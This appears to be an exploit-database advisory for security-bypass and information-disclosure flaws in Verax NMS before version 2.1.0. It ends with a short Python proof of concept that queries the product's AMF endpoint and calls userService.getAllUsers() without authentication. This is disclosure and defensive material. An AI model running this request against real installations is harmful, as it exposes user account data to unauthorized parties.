Verax NMS Security Bypass and Information Disclosure Vulnerabilities

vendor:

Verax NMS

by:

SecurityFocus

7,5

CVSS

HIGH

Security Bypass and Information Disclosure

200

CWE

Product Name: Verax NMS

Affected Version From: Prior to Verax NMS 2.1.0

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Python

2013

Verax NMS Security Bypass and Information Disclosure Vulnerabilities

Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities. Attackers can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and obtain sensitive information; this may aid in launching further attacks.

Mitigation:

Upgrade to Verax NMS version 2.1.0 or later.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/58334/info

Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities.

Attackers can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and obtain sensitive information; this may aid in launching further attacks.

Versions prior to Verax NMS 2.1.0 are vulnerable. 

#!/usr/bin/python

 #just based on http://www.example.com/tutorials/general/client.html#basic-example
 from pyamf import AMF0, AMF3
 from pyamf.remoting.client import RemotingService

 client = RemotingService('http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf',
amf_version=AMF3)
 service = client.getService('userService')

 print service.getAllUsers()